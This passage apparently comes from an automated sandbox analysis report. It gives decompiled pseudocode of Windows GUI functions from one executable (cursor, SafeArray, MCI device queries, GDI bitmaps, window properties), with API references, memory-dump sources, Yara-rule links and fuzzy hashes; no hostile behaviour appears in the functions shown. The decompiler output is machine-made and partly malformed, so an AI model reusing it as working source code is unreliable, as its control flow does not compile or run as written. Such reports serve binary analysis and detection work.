				return _t7;
			}












                                                                                0x004536e4
                                                                                0x004536e4
                                                                                0x004536e8
                                                                                0x004536eb
                                                                                0x004536ed
                                                                                0x004536f3
                                                                                0x00453768
                                                                                0x00453768
                                                                                0x004536f5
                                                                                0x004536f5
                                                                                0x004536fc
                                                                                0x00453758
                                                                                0x00453763
                                                                                0x00000000
                                                                                0x004536fe
                                                                                0x004536ff
                                                                                0x00453704
                                                                                0x00453711
                                                                                0x00453715
                                                                                0x00000000
                                                                                0x00453717
                                                                                0x0045371a
                                                                                0x00453728
                                                                                0x00000000
                                                                                0x0045372a
                                                                                0x00453751
                                                                                0x00453751
                                                                                0x00453728
                                                                                0x00453715
                                                                                0x004536fc
                                                                                0x00453771

                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 004536FF
                                                                                • WindowFromPoint.USER32(?,?), ref: 0045370C
                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0045371A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00453721
                                                                                • SendMessageA.USER32(00000000,00000084,00000000,00000000), ref: 0045373A
                                                                                • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00453751
                                                                                • SetCursor.USER32(00000000), ref: 00453763
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                • String ID:
                                                                                • API String ID: 1770779139-0
                                                                                • Opcode ID: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction ID: d50399b3e599f5152306f37c222da6bd6a6c0ddd4f97c88b5f6b33df3f17dc2d
                                                                                • Opcode Fuzzy Hash: 97c1251a2dc017318d3c834370b70947865f55d3f202999908b9ae6f3fc3c1b4
                                                                                • Instruction Fuzzy Hash: 1B01D4A670430036D6253A364D86F3F25989B85B96F10413FBA04BA2C3EA3D9D08536E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040C364, Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 67%
                                                                                			E0040C364(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t44;
				signed int _t49;
				signed short* _t56;
				char* _t58;
				void* _t64;
				intOrPtr* _t69;
				signed short* _t76;
				signed short* _t79;
				intOrPtr _t88;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t94;
				intOrPtr* _t102;
				void* _t106;
				intOrPtr _t107;
				char* _t108;
				void* _t109;

				_v780 = __ecx;
				_v776 = __eax;
				_t44 =  *((intOrPtr*)(__edx));
				_t97 = _t44 & 0x00000fff;
				if((_t44 & 0x00000fff) != 0xc) {
					_push(__edx);
					_t88 = _v776;
					_push(_t88);
					L0040C060();
					return _t88;
				}
				if((_t44 & 0x00000040) == 0) {
					_v792 =  *((intOrPtr*)(__edx + 8));
				} else {
					_v792 =  *((intOrPtr*)( *((intOrPtr*)(__edx + 8))));
				}
				_v788 =  *_v792 & 0x0000ffff;
				_t90 = _v788 - 1;
				if(_t90 >= 0) {
					_t94 = _t90 + 1;
					_t106 = 0;
					_t108 =  &_v772;
					do {
						_v804 = _t108;
						_push(_v804 + 4);
						_t16 = _t106 + 1; // 0x1
						_t76 = _v792;
						_push(_t76);
						L0040C088();
						if(_t76 != 0) {
							E00402888(0x14);
						}
						_push( &_v784);
						_t19 = _t106 + 1; // 0x1
						_t79 = _v792;
						_push(_t79);
						L0040C090();
						if(_t79 != 0) {
							E00402888(0x14);
						}
						 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
						_t106 = _t106 + 1;
						_t108 = _t108 + 8;
						_t94 = _t94 - 1;
					} while (_t94 != 0);
				}
				_push( &_v772);
				_t49 = _v788;
				_push(_t49);
				_push(0xc);
				L0040C078();
				_t107 = _t49;
				if(_t107 == 0) {
					E00402888(0x12);
				}
				E0040C224(_v776, _t97);
				 *_v776 = 0x200c;
				 *((intOrPtr*)(_v776 + 8)) = _t107;
				_t92 = _v788 - 1;
				if(_t92 >= 0) {
					_t93 = _t92 + 1;
					_t69 =  &_v768;
					_t102 =  &_v260;
					do {
						 *_t102 =  *_t69;
						_t102 = _t102 + 4;
						_t69 = _t69 + 8;
						_t93 = _t93 - 1;
					} while (_t93 != 0);
					do {
						goto L17;
					} while (_t64 != 0);
					return _t64;
				}
				L17:
				_push( &_v796);
				_push( &_v260);
				_t56 = _v792;
				_push(_t56);
				L0040C0A8();
				if(_t56 != 0) {
					E00402888(0x14);
				}
				_push( &_v800);
				_t58 =  &_v260;
				_push(_t58);
				_push(_t107);
				L0040C0A8();
				if(_t58 != 0) {
					E00402888(0x14);
				}
				_v780();
				_t64 = E0040C308(_v788 - 1, _t109);
			}

































                                                                                0x0040c370
                                                                                0x0040c376
                                                                                0x0040c37c
                                                                                0x0040c381
                                                                                0x0040c38a
                                                                                0x0040c38c
                                                                                0x0040c38d
                                                                                0x0040c393
                                                                                0x0040c394
                                                                                0x00000000
                                                                                0x0040c394
                                                                                0x0040c3a1
                                                                                0x0040c3b3
                                                                                0x0040c3a3
                                                                                0x0040c3a8
                                                                                0x0040c3a8
                                                                                0x0040c3c2
                                                                                0x0040c3ce
                                                                                0x0040c3d1
                                                                                0x0040c3d3
                                                                                0x0040c3d4
                                                                                0x0040c3d6
                                                                                0x0040c3dc
                                                                                0x0040c3de
                                                                                0x0040c3ed
                                                                                0x0040c3ee
                                                                                0x0040c3f2
                                                                                0x0040c3f8
                                                                                0x0040c3f9
                                                                                0x0040c400
                                                                                0x0040c404
                                                                                0x0040c404
                                                                                0x0040c40f
                                                                                0x0040c410
                                                                                0x0040c414
                                                                                0x0040c41a
                                                                                0x0040c41b
                                                                                0x0040c422
                                                                                0x0040c426
                                                                                0x0040c426
                                                                                0x0040c441
                                                                                0x0040c443
                                                                                0x0040c444
                                                                                0x0040c447
                                                                                0x0040c447
                                                                                0x0040c3dc
                                                                                0x0040c450
                                                                                0x0040c451
                                                                                0x0040c457
                                                                                0x0040c458
                                                                                0x0040c45a
                                                                                0x0040c45f
                                                                                0x0040c463
                                                                                0x0040c467
                                                                                0x0040c467
                                                                                0x0040c472
                                                                                0x0040c47d
                                                                                0x0040c488
                                                                                0x0040c491
                                                                                0x0040c494
                                                                                0x0040c496
                                                                                0x0040c497
                                                                                0x0040c49d
                                                                                0x0040c4a3
                                                                                0x0040c4a5
                                                                                0x0040c4a7
                                                                                0x0040c4aa
                                                                                0x0040c4ad
                                                                                0x0040c4ad
                                                                                0x0040c4b0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040c520
                                                                                0x0040c520
                                                                                0x0040c4b0
                                                                                0x0040c4b6
                                                                                0x0040c4bd
                                                                                0x0040c4be
                                                                                0x0040c4c4
                                                                                0x0040c4c5
                                                                                0x0040c4cc
                                                                                0x0040c4d0
                                                                                0x0040c4d0
                                                                                0x0040c4db
                                                                                0x0040c4dc
                                                                                0x0040c4e2
                                                                                0x0040c4e3
                                                                                0x0040c4e4
                                                                                0x0040c4eb
                                                                                0x0040c4ef
                                                                                0x0040c4ef
                                                                                0x0040c502
                                                                                0x0040c510

                                                                                APIs
                                                                                • VariantCopy.OLEAUT32(?), ref: 0040C394
                                                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040C3F9
                                                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040C41B
                                                                                • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040C45A
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040C4C5
                                                                                • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040C4E4
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                • String ID:
                                                                                • API String ID: 351091851-0
                                                                                • Opcode ID: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction ID: e8cfbddb4b6d86e1814c4b1c7dcfa7253a557c948e887391303c1413b19c10f2
                                                                                • Opcode Fuzzy Hash: bde47607384e88626c11003b3b21496450f61ba110f915f81c0edd029a5ca511
                                                                                • Instruction Fuzzy Hash: E6510D7590121DDBDB25DB59CD90BDAB3BCBB08304F4042EAEA09F7281D634AF858F64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046A3B4, Relevance: 9.1, APIs: 6, Instructions: 107COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 88%
                                                                                			E0046A3B4(void* __eax) {
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				void* _v140;
				char _t53;
				char _t57;
				char _t61;
				char _t65;
				intOrPtr _t69;
				intOrPtr _t76;
				void* _t77;
				long _t79;
				long _t82;

				_t77 = __eax;
				_t79 = _t82;
				 *(__eax + 0x2e8) = 0x102;
				 *((intOrPtr*)(_t79 + 8)) = 8;
				mciSendCommandA( *(__eax + 0x2f2) & 0x0000ffff, 0x80b, 0x102, _t79);
				_t53 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e3)) = _t53;
				if(_t53 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000004;
				}
				 *((intOrPtr*)(_t79 + 8)) = 1;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t57 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e6)) = _t57;
				if(_t57 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000008;
				}
				 *((intOrPtr*)(_t79 + 8)) = 7;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t61 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e5)) = _t61;
				if(_t61 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000002;
				}
				 *((intOrPtr*)(_t79 + 8)) = 3;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t65 =  *((intOrPtr*)(_t79 + 4));
				 *((char*)(_t77 + 0x2e7)) = _t65;
				if(_t65 != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000010;
				}
				 *((intOrPtr*)(_t79 + 8)) = 4;
				mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x80b,  *(_t77 + 0x2e8), _t79);
				_t69 =  *((intOrPtr*)(_t79 + 4));
				if(_t69 == 0x207 || _t69 == 0x208 || _t69 == 0x203 || _t69 == 0x201) {
					 *((char*)(_t77 + 0x2e4)) = 1;
				}
				if( *((char*)(_t77 + 0x2e4)) != 0) {
					 *(_t77 + 0x2e2) =  *(_t77 + 0x2e2) | 0x00000001;
				}
				 *(_t77 + 0x2e8) = 0x20000;
				 *((intOrPtr*)(_t77 + 0x304)) = mciSendCommandA( *(_t77 + 0x2f2) & 0x0000ffff, 0x843, 0x20000,  &_v128);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)(_t77 + 0x310)) = _v116 - _v124;
				_t76 = _v112 - _v120;
				 *((intOrPtr*)(_t77 + 0x314)) = _t76;
				return _t76;
			}


















                                                                                0x0046a3ba
                                                                                0x0046a3bc
                                                                                0x0046a3c3
                                                                                0x0046a3c9
                                                                                0x0046a3df
                                                                                0x0046a3e4
                                                                                0x0046a3e7
                                                                                0x0046a3ef
                                                                                0x0046a3f1
                                                                                0x0046a3f1
                                                                                0x0046a3f8
                                                                                0x0046a414
                                                                                0x0046a419
                                                                                0x0046a41c
                                                                                0x0046a424
                                                                                0x0046a426
                                                                                0x0046a426
                                                                                0x0046a42d
                                                                                0x0046a449
                                                                                0x0046a44e
                                                                                0x0046a451
                                                                                0x0046a459
                                                                                0x0046a45b
                                                                                0x0046a45b
                                                                                0x0046a462
                                                                                0x0046a47e
                                                                                0x0046a483
                                                                                0x0046a486
                                                                                0x0046a48e
                                                                                0x0046a490
                                                                                0x0046a490
                                                                                0x0046a497
                                                                                0x0046a4b3
                                                                                0x0046a4b8
                                                                                0x0046a4c0
                                                                                0x0046a4d7
                                                                                0x0046a4d7
                                                                                0x0046a4e5
                                                                                0x0046a4e7
                                                                                0x0046a4e7
                                                                                0x0046a4f3
                                                                                0x0046a511
                                                                                0x0046a51f
                                                                                0x0046a520
                                                                                0x0046a521
                                                                                0x0046a522
                                                                                0x0046a52b
                                                                                0x0046a535
                                                                                0x0046a539
                                                                                0x0046a545

                                                                                APIs
                                                                                • mciSendCommandA.WINMM(?,0000080B,00000102), ref: 0046A3DF
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A414
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A449
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A47E
                                                                                • mciSendCommandA.WINMM(?,0000080B,?), ref: 0046A4B3
                                                                                • mciSendCommandA.WINMM(?,00000843,00020000,?), ref: 0046A50C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: CommandSend
                                                                                • String ID:
                                                                                • API String ID: 3079401599-0
                                                                                • Opcode ID: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction ID: 9f3064282c2c23eb361a6cf1d432f5e155d01ea21818f742c5ad4657b8b276cc
                                                                                • Opcode Fuzzy Hash: fa762538808ecbf9c70f82dd65a79da2be8a886e74ae2368f223f3776803766a
                                                                                • Instruction Fuzzy Hash: 27419560444791AADB11CF54C8CDBA73BE8AF05304F0844BAFD9C9F287D7B99848CB66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00420BFC, Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 68%
                                                                                			E00420BFC(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, int _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				signed short _v44;
				int _t36;
				signed int _t37;
				signed short _t38;
				signed int _t39;
				signed short _t43;
				signed int* _t47;
				signed int _t51;
				intOrPtr _t61;
				void* _t67;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t68 = _t69;
				_t70 = _t69 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t47 = _a8;
				_v24 = _v16 << 4;
				_v20 = E00408330(_v24, __eflags);
				 *[fs:edx] = _t70;
				_t51 = _v24;
				 *((intOrPtr*)( *_v8 + 8))( *[fs:edx], 0x420ef3, _t68, __edi, __esi, __ebx, _t67);
				if(( *_t47 | _t47[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t47;
					 *(_t36 + 4) = _t47[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_t36 = GetSystemMetrics(0xc);
					 *(_a4 + 4) = _t36;
				}
				_push(0);
				L00406E20();
				_v44 = _t36;
				if(_v44 == 0) {
					E004200C0(_t51);
				}
				_push(_t68);
				_push(0x420ce5);
				_push( *[fs:edx]);
				 *[fs:edx] = _t70;
				_push(0xe);
				_t37 = _v44;
				_push(_t37);
				L00406AF8();
				_push(0xc);
				_t38 = _v44;
				_push(_t38);
				L00406AF8();
				_t39 = _t37 * _t38;
				if(_t39 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t39;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E00420CEC);
				_t43 = _v44;
				_push(_t43);
				_push(0);
				L00407080();
				return _t43;
			}






















                                                                                0x00420bfd
                                                                                0x00420bff
                                                                                0x00420c05
                                                                                0x00420c08
                                                                                0x00420c0b
                                                                                0x00420c0e
                                                                                0x00420c17
                                                                                0x00420c22
                                                                                0x00420c30
                                                                                0x00420c36
                                                                                0x00420c3e
                                                                                0x00420c46
                                                                                0x00420c63
                                                                                0x00420c68
                                                                                0x00420c6d
                                                                                0x00420c48
                                                                                0x00420c52
                                                                                0x00420c56
                                                                                0x00420c5e
                                                                                0x00420c5e
                                                                                0x00420c70
                                                                                0x00420c72
                                                                                0x00420c77
                                                                                0x00420c7e
                                                                                0x00420c80
                                                                                0x00420c80
                                                                                0x00420c87
                                                                                0x00420c88
                                                                                0x00420c8d
                                                                                0x00420c90
                                                                                0x00420c93
                                                                                0x00420c95
                                                                                0x00420c98
                                                                                0x00420c99
                                                                                0x00420ca0
                                                                                0x00420ca2
                                                                                0x00420ca5
                                                                                0x00420ca6
                                                                                0x00420caf
                                                                                0x00420cb5
                                                                                0x00420cc7
                                                                                0x00420cc9
                                                                                0x00420cb7
                                                                                0x00420cb7
                                                                                0x00420cb7
                                                                                0x00420cce
                                                                                0x00420cd1
                                                                                0x00420cd4
                                                                                0x00420cd9
                                                                                0x00420cdc
                                                                                0x00420cdd
                                                                                0x00420cdf
                                                                                0x00420ce4

                                                                                APIs
                                                                                • GetSystemMetrics.USER32 ref: 00420C4A
                                                                                • GetSystemMetrics.USER32 ref: 00420C56
                                                                                • 72E7AC50.USER32(00000000), ref: 00420C72
                                                                                • 72E7AD70.GDI32(00000000,0000000E,00000000,00420CE5,?,00000000), ref: 00420C99
                                                                                • 72E7AD70.GDI32(00000000,0000000C,00000000,0000000E,00000000,00420CE5,?,00000000), ref: 00420CA6
                                                                                • 72E7B380.USER32(00000000,00000000,00420CEC,0000000E,00000000,00420CE5,?,00000000), ref: 00420CDF
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MetricsSystem$B380
                                                                                • String ID:
                                                                                • API String ID: 3145338429-0
                                                                                • Opcode ID: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction ID: b5a1ea645670a87a40300d2b3d0004dea96dac25918e5ae6dc528da29662d6d6
                                                                                • Opcode Fuzzy Hash: e33d606845e976a746918d03a0318887393e3dad17af5a3bfb32981df972067d
                                                                                • Instruction Fuzzy Hash: 1F31A270B00204DFEB04DFA6D881AAEBBF5FF49310F50816AF414AB391C6789D40CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042106C, Relevance: 9.1, APIs: 6, Instructions: 65COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 45%
                                                                                			E0042106C(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _t29;
				struct tagBITMAPINFO* _t32;
				intOrPtr _t39;
				struct HBITMAP__* _t43;
				void* _t46;

				_t32 = __ecx;
				_t43 = __eax;
				E00420F1C(__eax, _a4, __ecx);
				_v12 = 0;
				_push(0);
				L00406A58();
				_v16 = 0;
				_push(_t46);
				_push(0x421109);
				_push( *[fs:eax]);
				 *[fs:eax] = _t46 + 0xfffffff4;
				if(__edx != 0) {
					_push(0);
					_push(__edx);
					_t29 = _v16;
					_push(_t29);
					L00406BD0();
					_v12 = _t29;
					_push(_v16);
					L00406BA0();
				}
				_v5 = GetDIBits(_v16, _t43, 0, _t32->bmiHeader.biHeight, _a8, _t32, 0) != 0;
				_pop(_t39);
				 *[fs:eax] = _t39;
				_push(E00421110);
				if(_v12 != 0) {
					_push(0);
					_push(_v12);
					_push(_v16);
					L00406BD0();
				}
				return DeleteDC(_v16);
			}











                                                                                0x00421075
                                                                                0x00421079
                                                                                0x00421082
                                                                                0x00421089
                                                                                0x0042108c
                                                                                0x0042108e
                                                                                0x00421093
                                                                                0x00421098
                                                                                0x00421099
                                                                                0x0042109e
                                                                                0x004210a1
                                                                                0x004210a6
                                                                                0x004210a8
                                                                                0x004210aa
                                                                                0x004210ab
                                                                                0x004210ae
                                                                                0x004210af
                                                                                0x004210b4
                                                                                0x004210ba
                                                                                0x004210bb
                                                                                0x004210bb
                                                                                0x004210d9
                                                                                0x004210df
                                                                                0x004210e2
                                                                                0x004210e5
                                                                                0x004210ee
                                                                                0x004210f0
                                                                                0x004210f5
                                                                                0x004210f9
                                                                                0x004210fa
                                                                                0x004210fa
                                                                                0x00421108

                                                                                APIs
                                                                                  • Part of subcall function 00420F1C: GetObjectA.GDI32(?,00000054), ref: 00420F30
                                                                                • 72E7A590.GDI32(00000000), ref: 0042108E
                                                                                • 72E7B410.GDI32(?,?,00000000,00000000,00421109,?,00000000), ref: 004210AF
                                                                                • 72E7B150.GDI32(?,?,?,00000000,00000000,00421109,?,00000000), ref: 004210BB
                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 004210D2
                                                                                • 72E7B410.GDI32(?,00000000,00000000,00421110,00000000,?,?,?,00000000,00000000,00421109,?,00000000), ref: 004210FA
                                                                                • DeleteDC.GDI32(?), ref: 00421103
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B410$A590B150BitsDeleteObject
                                                                                • String ID:
                                                                                • API String ID: 3837315262-0
                                                                                • Opcode ID: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction ID: 4c8e86a8e62bf8e843ce22e0fa3398f7087306fd2782e42c4131c5f231b58ff0
                                                                                • Opcode Fuzzy Hash: e701bdbdbff6446c448e1e9e753bd8837e927accd3bded0621ef232a79ac0767
                                                                                • Instruction Fuzzy Hash: E3118275B002187FDB10EBA9CC51F5EB7FCAB4D700F518466B514F7281D678A9108B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004324CC, Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004324CC(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x46b8d0; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x46b8d0; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x46b8d0; // 0x0
				SetPropA(_a4,  *0x487b72 & 0x0000ffff, _t27);
				_t31 =  *0x46b8d0; // 0x0
				SetPropA(_a4,  *0x487b70 & 0x0000ffff, _t31);
				_t35 =  *0x46b8d0; // 0x0
				 *0x46b8d0 = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                                                                                0x004324d1
                                                                                0x004324d4
                                                                                0x004324dc
                                                                                0x004324e2
                                                                                0x004324f4
                                                                                0x00432509
                                                                                0x00432524
                                                                                0x00432524
                                                                                0x00432529
                                                                                0x0043253b
                                                                                0x00432540
                                                                                0x00432552
                                                                                0x00432563
                                                                                0x00432568
                                                                                0x00432578
                                                                                0x00432580

                                                                                APIs
                                                                                • SetWindowLongA.USER32 ref: 004324F4
                                                                                • GetWindowLongA.USER32 ref: 004324FF
                                                                                • GetWindowLongA.USER32 ref: 00432511
                                                                                • SetWindowLongA.USER32 ref: 00432524
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 0043253B
                                                                                • SetPropA.USER32(?,00000000,00000000), ref: 00432552
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LongWindow$Prop
                                                                                • String ID:
                                                                                • API String ID: 3887896539-0
                                                                                • Opcode ID: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction ID: 1d398ade87635050a55010048a09e70f80f05b49b1a79d506cad9994c015bbcd
                                                                                • Opcode Fuzzy Hash: 1d0c36f883103d76a0d62257e21793873c675a6b5b18f4571a362eb7fc807a2c
                                                                                • Instruction Fuzzy Hash: 1911EA75504249BFCB00EF99EC84D9A37ECFB08354F108226F914DB2A1D774EA408BA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004208AC, Relevance: 9.1, APIs: 6, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 87%
                                                                                			E004208AC(struct HDC__* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				short* _t15;
				void* _t18;
				struct HDC__* _t23;
				void* _t26;
				short* _t31;
				short* _t32;

				_t31 = 0;
				 *_t32 = 0x300;
				if(__eax == 0) {
